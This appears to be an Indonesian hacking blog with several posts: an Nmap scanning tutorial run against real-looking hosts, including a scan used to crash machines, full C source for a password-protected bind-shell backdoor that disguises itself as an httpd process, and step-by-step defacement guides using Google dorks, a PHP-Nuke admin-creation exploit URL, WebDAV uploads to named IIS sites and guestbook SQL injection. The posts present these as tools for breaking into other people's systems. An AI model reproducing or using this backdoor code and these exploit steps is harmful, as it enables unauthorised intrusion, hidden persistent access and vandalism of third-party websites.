Tutorial Nmap

Ditulis 18 December 2005 di Hacking Tabuh 16:08 → Aya 10 Bloger nu komen

Nmap adalah Tool untuk eksplorasi jaringan, secara ekslusif menjadi salah satu tool andalan yang sering digunakan oleh Administrator Jaringan, Pen-Test (IT Developer yg dibayar untuk mencari Hole pada System Jaringan) serta Attacker.
Tool ini digunakan sebagaimana namanya yaitu Penjelajah System Jaringan (Network Mapper, Network Exploration Tool). Dengan Nmap kamu bisa melakukan Probing (probe) keseluruh jaringan dan mencari tahu service apa yang aktif pada port yang lebih spesifik. Buka saja hanya itu tapi juga mencampur fingerprinting (Banner Grap) yang bisa membandingkan dan memberikan estimasi akan apa jenis Sistem Operasi (OS) target. Nmap juga mempunyai banyak kelebihan atau Flags yang akan memanipulasi bagaimana cara dia (Nmap) melakukan Scanning, kamu hanya perlu melakukan tcp()connect scanning yang akan membuat full connection ke host atau syn scanning juga biasa dikenal (a.k.a) Half Connection (ini susah negh jelasin half connection), testing Firewall atau mencari tahu apakan ada Firewall atau Packet Filter, Idle Scan (pembahasan mengenai Idle Scan, tunggu di Ezine selanjutnya yahh… :d)yang akan melakukan Spoofing (menyembunyikan IP kamu) ke Host yang lain atau memakai Decoy (host umpan) yang akan membuat JeJaK (trace) kamu semakin susah dilacak.

Nmap kompetibel dengan Linux/BSD Family (*nix) dan W*ndows, walaupun aku akan menjelaskan penggunaan Nmap melalui Linux, tapi versi yang di W*ndows sama dengan yang di Linux.

Tambahan : aku memakai Linux Distro Debian dan Nmap v3.50 (http://www.insecure.org)

/* Pilihan dan Flags */

Nmap 3.50 Usage: nmap [Scan Type(s)] [Options]
Some Common Scan Types (‘*’ options require root privileges)
* -sS TCP SYN stealth port scan (default if privileged (root))
-sT TCP connect() port scan (default for unprivileged users)
* -sU UDP port scan
-sP ping scan (Find any reachable machines)
* -sF,-sX,-sN Stealth FIN, Xmas, or Null scan (experts only)
-sV Version scan probes open ports determining service & app names/versions
-sR/-I RPC/Identd scan (use with other scan types)
Some Common Options (none are required, most can be combined):
* -O Use TCP/IP fingerprinting to guess remote operating system
-p ports to scan. Example range: ’1-1024,1080,6666,31337′
-F Only scans ports listed in nmap-services
-v Verbose. Its use is recommended. Use twice for greater effect.
-P0 Don’t ping hosts (needed to scan www.microsoft.com and others)
* -Ddecoy_host1,decoy2[,...] Hide scan using many decoys
-6 scans via IPv6 rather than IPv4
-T General timing policy
-n/-R Never do DNS resolution/Always resolve [default: sometimes resolve]
-oN/-oX/-oG Output normal/XML/grepable scan logs to
-iL Get targets from file; Use ‘-’ for stdin
* -S /-e Specify source address or network interface
–interactive Go into interactive mode (then press h for help)
Example: nmap -v -sS -O www.host-target.com 192.168.0.0/16 ’192.88-90.*.*’

*****************************************************
* Syn/Stealth Scanning. -sS TCP SYN stealth port scan
*****************************************************
cyberzone:/home/vQ# nmap -sS 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 15:37 WIT
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1636 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
199/tcp open smux
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
593/tcp filtered http-rpc-epmap
993/tcp open imaps
995/tcp open pop3s
3128/tcp open squid-http
3306/tcp open mysql
6000/tcp open X11
Nmap run completed — 1 IP address (1 host up) scanned in 115.478 seconds

** Perhatikan port 135,137,138,139,445 dan 539 di filter, Biasanya port yang di Filter menjalankan firewall. **
******************************************************
* TCP()Connect Scanning. -sT TCP connect() port scan
******************************************************
cyberzone:/home/vQ# nmap -sT 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 15:50 WIT
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1636 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
53/tcp open domain
80/tcp open http
110/tcp open pop3
111/tcp open rpcbind
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap
199/tcp open smux
443/tcp open https
445/tcp filtered microsoft-ds
465/tcp open smtps
587/tcp open submission
593/tcp filtered http-rpc-epmap
993/tcp open imaps
995/tcp open pop3s
3128/tcp open squid-http
3306/tcp open mysql
6000/tcp open X11
Nmap run completed — 1 IP address (1 host up) scanned in 41.839 seconds

Hal lain yang dapat kamu lakukan dengan -sT scanning adalah DoS (Denial of Service) sebuah Host.
seperti contoh dibawah ini…..

cyberzone:/home/vQ# nmap -T 5 -M 1000 -sT 203.130.254.xx
Warning: Your max_parallelism (-M) option is absurdly high! Don’t complain to Fyodor if all hell breaks loose!

berhubung target tujuan sudah memakai Stack-Guard (maka tidak terjadi kerusakan), tapi apabila anda melakukan ini ke Host yang running W*ndows XP kemungkinan 95% akan mengalami Crash. Bila kamu perhatikan bahwa aku memberi nmap -T 5 -M 1000, “Flag” -M adalah “Flag” untuk menggunakan jumlah maksimal “socket” yang digunakan oleh Nmap dan 60 “Socket” sudah bisa dikategorikan banyak (dan diatas aku memakai 1000 !! tapi sangat efektif euY….)

“Flag” -T adalah “Flag” untuk mengatur kecepatan scanning oleh Nmap. 0 yang terpelan dan 5 yang tercepat.

0 = Paranoid Mencoba menghindari deteksi IDS,tak ada scanning pararel, menunggu 5 menit sebelum mengirim tiap paket, so…. it really f*cking slow !

1 = Sneaky Juga mencoba untuk menghindari deteksi IDS, tak ada scanning pararel, menunggu 15 detik sebelum mengirim tiap paket…

2 = Polite Tetap sangat lambat, akan terdeteksi oleh semua jenis IDS. Menunggu sekitar 0.4 detik tiap paketnya. kira-kira 1 detik/paket.

3 = Normal kecepatan scanning standard nmap, yaitu scanning secepat mungkin tanpa resiko DoS.

4 = Aggressive sangat bagus untuk Network yang cepat (High Speed Broadband),mampu menembus firewall dan jaringan yang ter-filter.

5 = Insane a.k.a GeNdHeNg (gila), kamu akan kehilangan beberapa informasi direkomendasikan untuk Sweeping Network.

********************************************
* UDP scan -sU UDP port scan
********************************************
cyberzone:/home/vQ# nmap -sU 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 16:17 WIT
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1463 ports scanned but not shown below are in state: closed)
PORT STATE SERVICE
53/udp open domain
69/udp filtered tftp
111/udp open rpcbind
135/udp filtered msrpc
137/udp filtered netbios-ns
138/udp open netbios-dgm
139/udp filtered netbios-ssn
161/udp open snmp
162/udp open snmptrap
445/udp filtered microsoft-ds
1434/udp filtered ms-sql-m
3130/udp open squid-ipc
3401/udp open squid-snmp
32768/udp open omad
32770/udp open sometimes-rpc4
Nmap run completed — 1 IP address (1 host up) scanned in 2112.724 seconds

Tapi biasanya ada juga yang memakai firewall sehingga probing lewat UDP gak akan sukses, kalo udah begini ada cara lain lagi…..

Pinging -sP ping scan (Sweeping Host aktif)

cyberzone:/home/vQ# nmap –packet_trace -sP 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:11 WIT
SENT (0.0190s) ICMP 202.148.13.xx > 203.130.254.xx Echo request (type=8/code=0) ttl=42 id=17732 iplen=28

SENT (0.0190s) TCP 202.148.13.xx:59530 > 203.130.254.xx:80 A ttl=51 id=7528iplen=40 seq=750241886 win=4096 ack=750241886

RCVD (1.3770s) ICMP 203.130.254.xx > 202.148.13.xx Echo reply (type=0/code=0) ttl=55 id=26445 iplen=28

Host xx.subnet254.astinet.telkom.net.id (203.130.254.xx) appears to be up.

Nmap run completed — 1 IP address (1 host up) scanned in 12.340 seconds

Namun beberapa Host melakukan blok terhadap ping karena dianggap cukup efektif untuk menyembunyikan (Cloaking) Server mereka.

Teknik dasar untuk melihat Host yang aktif.

cyberzone:/home/vQ# nmap -sP 203.130.254.*
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:20 WIT
Host 1.subnet254.astinet.telkom.net.id (203.130.254.1) appears to be up.
Host 5.subnet254.astinet.telkom.net.id (203.130.254.5) appears to be up.
Host 16.subnet254.astinet.telkom.net.id (203.130.254.16) appears to be up.
Host 17.subnet254.astinet.telkom.net.id (203.130.254.17) appears to be up.
Host 29.subnet254.astinet.telkom.net.id (203.130.254.29) appears to be up.
Host 31.subnet254.astinet.telkom.net.id (203.130.254.31) appears to be up.
Host 32.subnet254.astinet.telkom.net.id (203.130.254.32) seems to be a subnet roadcast address (returned 1 extra pings). Note — the actual IP also responded.
Host 36.subnet254.astinet.telkom.net.id (203.130.254.36) appears to be up.
Host 37.subnet254.astinet.telkom.net.id (203.130.254.37) appears to be up.
Host 47.subnet254.astinet.telkom.net.id (203.130.254.47) seems to be a subnet roadcast address (returned 1 extra pings). Note — the actual IP also responded.
Host 48.subnet254.astinet.telkom.net.id (203.130.254.48) appears to be up.
Host 49.subnet254.astinet.telkom.net.id (203.130.254.49) appears to be up.
Host 63.subnet254.astinet.telkom.net.id (203.130.254.63) appears to be up.
Host 65.subnet254.astinet.telkom.net.id (203.130.254.65) appears to be up.
Host 68.subnet254.astinet.telkom.net.id (203.130.254.68) appears to be up.
Host 69.subnet254.astinet.telkom.net.id (203.130.254.69) appears to be up.
Host 81.subnet254.astinet.telkom.net.id (203.130.254.81) appears to be up.
Host 96.subnet254.astinet.telkom.net.id (203.130.254.96) appears to be up.
Host 97.subnet254.astinet.telkom.net.id (203.130.254.97) appears to be up.
Host 111.subnet254.astinet.telkom.net.id (203.130.254.111) appears to be up.
Host 203.130.254.128 appears to be up.
Host 129.subnet254.astinet.telkom.net.id (203.130.254.129) appears to be up.
Host 130.subnet254.astinet.telkom.net.id (203.130.254.130) appears to be up.
Host 131.subnet254.astinet.telkom.net.id (203.130.254.131) appears to be up.
Host 142.subnet254.astinet.telkom.net.id (203.130.254.142) appears to be up.
Host 143.subnet254.astinet.telkom.net.id (203.130.254.143) appears to be up.
Host 203.130.254.160 appears to be up.
Host 203.130.254.161 appears to be up.
Host 203.130.254.162 appears to be up.
Host 203.130.254.163 appears to be up.
Host 203.130.254.164 appears to be up.
Host 203.130.254.165 appears to be up.
Host 203.130.254.166 appears to be up.
Host 203.130.254.167 appears to be up.
Host 203.130.254.168 appears to be up.
Host 203.130.254.169 appears to be up.
Host 203.130.254.170 appears to be up.
Host 203.130.254.171 appears to be up.
Host 203.130.254.172 appears to be up.
Host 203.130.254.173 appears to be up.
Host 203.130.254.174 appears to be up.
Host 203.130.254.175 appears to be up.
Host 203.130.254.176 appears to be up.
Host 179.subnet254.astinet.telkom.net.id (203.130.254.179) appears to be up.
Host 180.subnet254.astinet.telkom.net.id (203.130.254.180) appears to be up.
Host 183.subnet254.astinet.telkom.net.id (203.130.254.183) appears to be up.
Host 191.subnet254.astinet.telkom.net.id (203.130.254.191) appears to be up.
Host telkomgw.stikom.edu (203.130.254.193) appears to be up.
Host 203.130.254.194 appears to be up.
Host ambrosia.stikom.edu (203.130.254.195) appears to be up.
Host omega.stikom.edu (203.130.254.196) appears to be up.
Host download.stikom.edu (203.130.254.197) appears to be up.
Host 203.130.254.199 appears to be up.
Host 203.130.254.200 appears to be up.
Host 215.subnet254.astinet.telkom.net.id (203.130.254.215) appears to be up.
Nmap run completed — 256 IP addresses (55 hosts up) scanned in 335.697 seconds

*******************************************
* Ftp Bounce Attack -b
********************************************

[Menarik tapi tak berguna]

cyberzone:/home/vQ# nmap -b 203.130.254.xx 203.130.254.xx

Hint: if your bounce scan target hosts aren’t reachable from here, remember to use -P0 so we don’t try and ping them prior to the scan Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:44 WIT

Your ftp bounce proxy server won’t talk to us!

Ini yang bakalan kamu terima setiap FTP server yang kamu scanning !!

/* Penutup */

Sebenarnya masih banyak tehnik lain lagi yang bisa dilakukan tergantung kreatifitas anda, sebagai tambahan aku sertakan salah satu Combo Scanning yang biasa aku lakukan….

cyberzone:/home/vicky# nmap -v -sS -sV -O -v 203.130.254.xx
Starting nmap 3.50 ( http://www.insecure.org/nmap/ ) at 2004-06-24 17:52 WIT
Host xx.subnet254.astinet.telkom.net.id (203.130.254.xx) appears to be up … good.
Initiating SYN Stealth Scan against xx.subnet254.astinet.telkom.net.id (203.130.254.xx) at 17:52
Adding open port 110/tcp
Adding open port 6000/tcp
Adding open port 995/tcp
adjust_timeout: packet supposedly had rtt of 12210894 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13126862 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13696829 microseconds. Ignoring time.
Adding open port 80/tcp
adjust_timeout: packet supposedly had rtt of 25753793 microseconds. Ignoring time.
Adding open port 3306/tcp
adjust_timeout: packet supposedly had rtt of 25845379 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 26664043 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13675951 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13597619 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27226534 microseconds. Ignoring time.
Adding open port 53/tcp
adjust_timeout: packet supposedly had rtt of 51264396 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27144765 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 51336689 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52158192 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13717478 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52711309 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27273293 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52631826 microseconds. Ignoring time.
Adding open port 993/tcp
adjust_timeout: packet supposedly had rtt of 13668042 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 100643854 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 52756355 microseconds. Ignoring time.
Adding open port 22/tcp
adjust_timeout: packet supposedly had rtt of 99334735 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 27012389 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 101595861 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 13831231 microseconds. Ignoring time.
Adding open port 443/tcp
adjust_timeout: packet supposedly had rtt of 100721309 microseconds. Ignoring time.
Adding open port 25/tcp
adjust_timeout: packet supposedly had rtt of 102030144 microseconds. Ignoring time.
Adding open port 587/tcp
adjust_timeout: packet supposedly had rtt of 27349002 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 10864537 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 51118187 microseconds. Ignoring time.
Adding open port 199/tcp
Adding open port 3128/tcp
adjust_timeout: packet supposedly had rtt of 11560500 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 10717091 microseconds. Ignoring time.
Adding open port 465/tcp
Adding open port 143/tcp
Adding open port 21/tcp
adjust_timeout: packet supposedly had rtt of 24399319 microseconds. Ignoring time.
Adding open port 111/tcp
adjust_timeout: packet supposedly had rtt of 11045019 microseconds. Ignoring time.
adjust_timeout: packet supposedly had rtt of 10938220 microseconds. Ignoring time.

The SYN Stealth Scan took 174 seconds to scan 1659 ports.
Initiating service scan against 17 services on 1 host at 17:55
The service scan took 38 seconds to scan 17 services on 1 host.
Initiating RPCGrind Scan against xx.subnet254.astinet.telkom.net.id (203.130.254.xx) at 17:56
The RPCGrind Scan took 3 seconds to scan 1 ports.
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
For OSScan assuming that port 21 is open and port 1 is closed and neither are firewalled
Insufficient responses for TCP sequencing (0), OS detection may be less accurate
Interesting ports on xx.subnet254.astinet.telkom.net.id (203.130.254.xx):
(The 1636 ports scanned but not shown below are in state: closed)

PORT STATE SERVICE VERSION
21/tcp open ftp vsFTPd 1.1.0
22/tcp open ssh OpenSSH 3.4p1 (protocol 1.99)
25/tcp open smtp
53/tcp open domain ISC Bind 9.2.1
80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
110/tcp open pop3 Courier pop3d
111/tcp open rpcbind 2 (rpc #100000)
135/tcp filtered msrpc
137/tcp filtered netbios-ns
138/tcp filtered netbios-dgm
139/tcp filtered netbios-ssn
143/tcp open imap Courier IMAP4rev1 1.7.X
199/tcp open smux Linux SNMP multiplexer
443/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
445/tcp filtered microsoft-ds
465/tcp open ssl OpenSSL
587/tcp open smtp Courier smtpd
593/tcp filtered http-rpc-epmap
993/tcp open ssl OpenSSL
995/tcp open ssl OpenSSL
3128/tcp open http-proxy Squid webproxy 2.4.STABLE7
3306/tcp open mysql?
6000/tcp open X11 (access denied)
1 service unrecognized despite returning data. If you know the service/version,
please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi:
SF-Port25-TCP:V=3.50%D=6/24%Time=40DAB33B%P=i686-pc-linux-gnu%r(Help,1C,”2
SF:20\x20mail\.jombang\.org\x20ESMTP\r\n”);
Device type: general purpose
Running: Linux 2.4.X
OS details: Linux 2.4.6 – 2.4.21, Linux Kernel 2.4.19 – 2.4.20, Linux 2.4.21 (X86)
OS Fingerprint:
T1(Resp=N)
T2(Resp=N)
T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN
=134%DAT=E)

Nmap run completed — 1 IP address (1 host up) scanned in 256.323 seconds

Bila kamu perhatikan diatas aku make “Flag” -v sampai 2x, sesuai anjuran Fyodor (yg punya Nmap), sebaiknya “Flag” -v (verbose) dipakai 2x untuk meningkatkan akurasi nya….. trus “Flag” -sV untuk menebak service yang berjalan di port yang terbuka dan “Flag” -O untuk menebak Sistem Operasi (OS) a.k.a OS Fingerprinting.

Aya 10 Bloger nu komen | Permalink

Backdoor Bindtty

Ditulis 29 October 2005 di Hacking Tabuh 16:14 → Sok atuh Ngomen

Cara menyembunyikan Backdor yang jalan di background

Exploit:
/*
BindTTY.c
CreaTed By someONE
i just ModiFY..
Open TelnET with PasSWord,
Stealth BAckGround Proses..

compiled with : gcc -o bind.c bind
just simple run ./bind
for more ‘secure’
1. mv bind httpd
2. ./httpd
3. ps -A
Can u See Your BackDoor? ^^
4. but i dont know how to hide in /etc/services?
SomeONE know?
*/

#define HOME “/”
#define TIOCSCTTY 0x540E
#define TIOCGWINSZ 0×5413
#define TIOCSWINSZ 0×5414
#define ECHAR 0x1d
#define PORT 2006
#define BUF 32768
#define proc “/usr/sbin/httpd” /*Change this for Fake BG proces */
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
struct winsize {
unsigned short ws_row;
unsigned short ws_col;
unsigned short ws_xpixel;
unsigned short ws_ypixel;
};
int sc;
char passwd[] = “cantik”; /* Change The password */
char motd[] =”=- Arai PriVAte BaCkd00r #jambihackerlink-=\n”;
void cb_shell() {
char buffer[150];
write(sc, “Password: “, 10);
read(sc, buffer, sizeof(buffer));
if (!strncmp(buffer, passwd, strlen(passwd))) {
write(sc, motd, sizeof(motd));
}
else {
write(sc, “DiE!!!\n”, 7);
close(sc); exit(0);
}
}
/* creates tty/pty name by index */
void get_tty(int num, char *base, char *buf)
{
char series[] = “pqrstuvwxyzabcde”;
char subs[] = “0123456789abcdef”;
int pos = strlen(base);
strcpy(buf, base);
buf[pos] = series[(num >> 4) & 0xF];
buf[pos+1] = subs[num & 0xF];
buf[pos+2] = 0;
}
/* search for free pty and open it */
int open_tty(int *tty, int *pty)
{
char buf[512];
int i, fd;
fd = open(“/dev/ptmx”, O_RDWR);
close(fd);
for (i=0; i < 256; i++) {
get_tty(i, "/dev/pty", buf);
*pty = open(buf, O_RDWR);
if (*pty < 0) continue;
get_tty(i, "/dev/tty", buf);
*tty = open(buf, O_RDWR);
if (*tty < 0) {
close(*pty);
continue;
}
return 1;
}
return 0;
}

/* to avoid creating zombies ;) */
void sig_child(int i)
{
signal(SIGCHLD, sig_child);
waitpid(-1, NULL, WNOHANG);
}
void hangout(int i)
{
kill(0, SIGHUP);
kill(0, SIGTERM);
}
int main (int argc, char *argv[])
{
int pid;
struct sockaddr_in serv;
struct sockaddr_in cli;
int sock;
char cmd[256];
strcpy (argv[0], proc);
signal (SIGCHLD, SIG_IGN);
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (sock < 0) {
perror("socket");
return 1;
}
bzero((char *) &serv, sizeof(serv));
serv.sin_family = AF_INET;
serv.sin_addr.s_addr = htonl(INADDR_ANY);
serv.sin_port = htons(PORT);
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) {
perror("bind");
return 1;
}
if (listen(sock, 5) < 0) {
perror("listen");
return 1;
}
printf("Arai BackDoor is starting..."); fflush(stdout);
pid = fork();
if (pid !=0 ) {
printf("OK, pid = %d\n", pid);
printf("#jambihackerlink Private BackD00r..\n");
return 0;
}
/* daemonize */
setsid();
chdir("/");
pid = open("/dev/null", O_RDWR);
dup2(pid, 0);
dup2(pid, 1);
dup2(pid, 2);
close(pid);
signal(SIGHUP, SIG_IGN);
signal(SIGCHLD, sig_child);
while (1) {
int scli;
int slen;
slen = sizeof(cli);
scli = accept(sock, (struct sockaddr *) &cli, &slen);
if (scli < 0) continue;
pid = fork();
if (pid == 0) {
int subshell;
int tty;
int pty;
fd_set fds;
char buf[BUF];
char *argv[] = {"sh", "-i", NULL};
#define MAXENV 256
#define ENVLEN 256
char *envp[MAXENV];
char envbuf[(MAXENV+2) * ENVLEN];
int j, i;
char home[256];
/* setup enviroment */
envp[0] = home;
sprintf(home, "HOME=%s", HOME);
j = 0;
do {
i = read(scli, &envbuf[j * ENVLEN], ENVLEN);
envp[j+1] = &envbuf[j * ENVLEN];
j++;
if ((j >= MAXENV) || (i < ENVLEN)) break;
} while (envbuf[(j-1) * ENVLEN] != '\n');
envp[j+1] = NULL;
/* create new group */
setpgid(0, 0);
/* open slave & master side of tty */
if (!open_tty(&tty, &pty)) {
char msg[] = "Can't fork pty, bye!\n";
write(scli, msg, strlen(msg));
close(scli);
exit(0);
}
/* fork child */
subshell = fork();
if (subshell == 0) {
/* close master */
close(pty);
/* attach tty */
setsid();
ioctl(tty, TIOCSCTTY);
/* close local part of connection */
close(scli);
close(sock);
signal(SIGHUP, SIG_DFL);
signal(SIGCHLD, SIG_DFL);
dup2(tty, 0);
dup2(tty, 1);
dup2(tty, 2);
close(tty);
cb_shell();
execve("/bin/sh", argv, envp);
}
/* close slave */
close(tty);
signal(SIGHUP, hangout);
signal(SIGTERM, hangout);
while (1) {
/* watch tty and client side */
FD_ZERO(&fds);
FD_SET(pty, &fds);
FD_SET(scli, &fds);
if (select((pty > scli) ? (pty+1) : (scli+1),
&fds, NULL, NULL, NULL) < 0)
{
break;
}
if (FD_ISSET(pty, &fds)) {
int count;
count = read(pty, buf, BUF);
if (count <= 0) break;
if (write(scli, buf, count) <= 0) break;
}
if (FD_ISSET(scli, &fds)) {
int count;
unsigned char *p, *d;
d = buf;
count = read(scli, buf, BUF);
if (count <= 0) break;
/* setup win size */
p = memchr(buf, ECHAR, count);
if (p) {
unsigned char wb[5];
int rlen = count - ((ulong) p - (ulong) buf);
struct winsize ws;
/* wait for rest */
if (rlen > 5) rlen = 5;
memcpy(wb, p, rlen);
if (rlen < 5) {
read(scli, &wb[rlen], 5 - rlen);
}
/* setup window */
ws.ws_xpixel = ws.ws_ypixel = 0;
ws.ws_col = (wb[1] << 8) + wb[2];
ws.ws_row = (wb[3] << 8) + wb[4];
ioctl(pty, TIOCSWINSZ, &ws);
kill(0, SIGWINCH);
/* write the rest */
write(pty, buf, (ulong) p - (ulong) buf);
rlen = ((ulong) buf + count) - ((ulong)p+5);
if (rlen > 0) write(pty, p+5, rlen);
} else
if (write(pty, d, count) <= 0) break;
}
}
close(scli);
close(sock);
close(pty);
waitpid(subshell, NULL, 0);
vhangup();
exit(0);
}
close(scli);
}
}

/* EOF */

Sok atuh Ngomen | Permalink

Langkah-Langkah Deface

Ditulis 7 October 2005 di Hacking Tabuh 23:25 → Aya 20 Bloger nu komen

Deface situs php nuke

Buka situs www.google.com
kemudian ketik =>
allinurl:.com/nuke/index.php atau
allinurl:.org/nuke/index.php.
Nah ….. kalo udah ketemu targetnya maka langkah
selanjutnya adalah :
1. www.target.com/nuke/index.php
2. www.target.com/nuke/admin.php =>
index.php yg diatas tadi dirubah
menjadi admin.php
3. Masukkan bug ini di belakang situs tadi :

?op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

misal : www.target.com/nuke/admin.php?
op=AddAuthor&add_aid=budakbaonk&add_name=
God&add_pwd=bajingan&add_email=
sandal_karet@yahoo.com&add_radminsuper=1&admin=
eCcgVU5JT04gU0VMRUNUIDEvKjox

Kalo nggak mau berarti situs tsb udah di path ama admin nya.
Tapi kalo berhasil, maka di url/browsing lu muncul
www.target.com/nuke/admin.php?op=mod_author

5. Disana lu di suruh login, masukin id & password lu tadi.
Masih ingat kan ?
id=budakbaonk => liat yg diatas tadi
password=bajingan => liat yg diatas tadi

Nah lu skrg udah masuk ke “Administration Menu” situs tsb.
Berarti lu udah mengusai situs tsb skrg ! He he he he he
Skrg lu pilih gambar Handphone (dibawahnya ada tulisan Messages),
Kolom title =>

Kolom content =>

Kolom expiration => unlimited
trus klik tab add messages yg ada dibawah
Kalo udah, buka url/browsing baru lalu ketikkan situs target tadi,
misal www.target.com/nuke atau www.target.com/nuke/index.php
kalo nggak ada hasil deface lu coba klik tab refresh yg ada
diatas yg disamping url/browsing lu

========================================

Deface asp/iis dgn menggunakan win 98

1. Klik Icon “My Computer” di komputer kamu.
2. Cari Icon “Web Folder” didalam My Computer Itu.
3. Klick lagi Icon “Add web folder” dan akan muncul
“Type the location to add”.
4. Ketiklah nama situs yang akan kita deface/tambahkan filenya
misalnya http://www.52down.com. Kemudian klik Next.
5. Muncul “Enter the name for this Web Folder”, kemudian klik Finish.
kalau tidak ada “Finish” nya atau “Error” artinya tidak bisa dideface
jadi kamu musti cari target lain.
6. Apabila sudah berhasil, kembali lagi ke Web Folder, disana kita lihat
ada file http://www.52down.com. Klik file situs tsb.
7. Buka file “Hacked.html” kamu tadi (kalo belum ada file html,
lu buat dulu file html di ms.fronpage trus simpan di kompi lu)
terus copy kemudian kembali lagi ke file http://www.52down.com,
paste kan file “Test.html” tadi. Kalau tidak bisa di paste kan artinya
udah dipath sama adminnya, jadi kamu musti cari target lain.
8. Apabila sudah berhasil, kita lihat hasilnya di url/browsing
misalnya http://www.52down.com/Test.html
9. Kalau mau mencari target caranya cari di www.google.com terus
ketik allinurl:.com/index.asp atau allinurl:.org/default.asp
tinggal kreatifitas kamu mencari target.
Atau bisa cari target di http://www.zone-h.org/en/defacements/
klik mirror yg sebelah kanan (yg windows 2000),
Perhatikan target nya => Defacer: Infektion Group
Domain : www.namatarget.com << ini target nya

=======================================

cara membuat html :

Buka ms.frontpage, klik tab format diatas, trus pilih backgrounds,
trus pilih enable hyperlink, trus pilih color background,
pilih warna hitam, trus ok
Trus pilih tab center yg diatas (rata tengah) kayak ms.word,
ukuran huruf pilih no.5 (18pt), trus pilih font color (yg gambar A),
pilih warna merah, kalo udah tulis Hacked by nama nick kamu,
tekan enter 3 kali Trus ketik
Hey Admin……..do you a need help ? trus enter sekali,
trus tulis Matrix.Dal.Net – #surabayahack, trus enter 3 kali
Kalo kalo mau pake gambar pilih tab insert diatas, trus pilih pictures,
trus pilih from file…., di file name ketik
http://www.finagro.gov.co/902.gif atau cari file jpg/gif di pc lu
trus ok Kalo mau pake musik pilih tab format diatas,
trus pilih backgrounds trus pilih tab general,
pada “background sound location” ketik
http://www.indonesia.go.id/berkibar.mid atau cari file midi di pc lu
trus ok Utk nyimpan nya pilih tab file diatas, pilih save as…
file name : Hacked atau nama nick kamu, trus ok
Catatan : seandainya waktu lu nyimpan file ada keluar
“save embedded file” pilih “set action” trus pilih “dont save” trus ok
Utk meliat hasilnya pilih tab preview dibagian bawah.

=======================================

Deface guestbook (buku tamu)

Dengan menggunakan teknik SQL Injection,kita bisa mendeface guestbook
(bukutamu) baik file php,asp,cfm,cgi,html dan kawan2. Ingat2 nggak
semua guestbook bisa dideface.
Langkah2 nya

I. Cari target guestbook di www.google.co.id dgn mengetikkan
site:my guestbook.php atau site:com bukutamu.php

II. Kalo udah dapat target nya, misalnya www.namatarget.my/guestbook.php
maka yg perlu lu lakukan adalah mengisi kolom2 guestbook yg tersedia.
Lu nggak perlu mengisi kolom guestbook nya dgn identitas asli,
cukup identitas palsu aja.

contoh :

Nama : boneka lucu
Email : boneka_2005@yahoo.com
Website : www.boneka-lucu.com
Asal : toko boneka
Komentar :

Perhatikan baik2 perintah yg ada di kolom komentar,dgn cara
SQL Injection ke guestbook tsb, disitu kita akan memasukkan
sebuah gambar (jgn gambar porno ya ? nggak boleh lho ?
